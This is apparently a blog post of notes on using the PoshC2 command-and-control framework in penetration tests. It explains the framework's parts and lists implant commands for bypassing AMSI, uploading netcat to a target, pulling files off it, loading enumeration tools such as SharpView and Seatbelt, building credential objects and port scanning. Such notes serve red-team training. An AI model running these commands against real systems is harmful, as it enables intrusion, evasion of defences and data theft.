This is an ongoing post containing my notes on PoshC2 usage.

What is PoshC2?

PoshC2 is a command and control software. It is used to carry out post-exploitation tasks such as persistence, privilege escalation, lateral movements etc. during penetration testing and red teaming exercises. It supports Python3, PowerShell (v2 and v5), C# and C++. The official documentation is available here.

All of PoshC2 functionality can be divided into five components:

PoshC2 Server - Serves payloads that can be executed on target machine(s) and send a connection back to PoshC2. The server console also displays the output of command(s) executed on an implant. The server is written in Python.

Implants Receiver - Listens for the incoming implant connections and aggregates them. It is also used to load modules and execute commands on a single, multiple or all implants.

Payloads - Commands, shellcode, executable binaries that when executed on target machine(s) (aka implants) sends back a connection to Implant receiver. Payloads are developed using C#, Python, PowerShell, JavaScript, VBScript and support Windows, Linux (Python) and MacOS (Python).

Implants - Target machine(s) connected to PoshC2.

Modules - Scripts (PowerShell and Python) and executable binaries (C#) that help in conducting various post-exploitation tasks such as enumeration, privilege escalation, lateral movement, hash dump, port forwarding etc. A comprehensive list of modules is available here.

How to use?

The following video shows how to get PoshC2 up and running quickly. It covers:

• Installation on Kali Linux 2020.2

• Configuring PoshC2

• Running Posh-server and implants receiver

• Managing implants

• Modules

• Loading C# and PowerShell modules on an Implant

• Running commands on an implant

Read this to learn more about the lab environment used in this video.

Useful Commands (C# Implants)

Selecting Implant(s)

• To select a single implant, enter the ImplantID

• To select multiple implants, enter a comma separated list of ImplantIDs

• To select all implants, enter ALL

Quick Reference List of Commands

Issue the following command when connected to an implant(s)

help

Bypass AMSI

bypass-amsi

Upload files

upload-file <source file path> <destination file path>
Example: upload-file /usr/share/windows-binaries/nc.exe C:\Users\Public\nc.exe

Download files

download-file <file path>
Example: download-file 'C:\\Users\\Public\\supersecretdata.txt'

This will save a copy of the target file in the PoshC2 project directory.

List Modules

To list implant specific modules, select an implant and issue the following command:

 listmodules

To list all modules, issue the following command at implant selection prompt:

listmodules

Load a C# Module

loadmodule <module name>
Example: loadmodule SharpView.exe

Load a PowerShell Module

pslo <module name> 
Example: pslo powerview.ps1

You can also use loadmoduleforce to load modules.

Execute a PowerShell Command

sharpps <command> 
Example: sharpps Get-ChildItem -Force -Recurse

Convert Username and Password to a PSCredentials object

sharpps [string]$userName = 'IND\user.ind02'
sharpps [string]$userPassword = 'Sup3rStr0ngP@ssw0rd'
sharpps [securestring]$secStringPassword = ConvertTo-SecureString $userPassword -AsPlainText -Force
sharpps [pscredential]$credObject = New-Object System.Management.Automation.PSCredential ($userName, $secStringPassword)

After executing above commands, $credObject can be passed as a value to -Credential parameter in PowerShell commands which accept this parameter.

Enumerate an Implant

ls-recurse <directory path>
Example:  ls-recurse C:\Users
get-userinfo
get-computerinfo
loadmodule Seatbelt.exe
seatbelt all
sharpup

Port Scan

portscan <IP> <port> <delay-in-seconds> <max thread>
Example: portscan "192.168.3.8" "1-1000" 1 100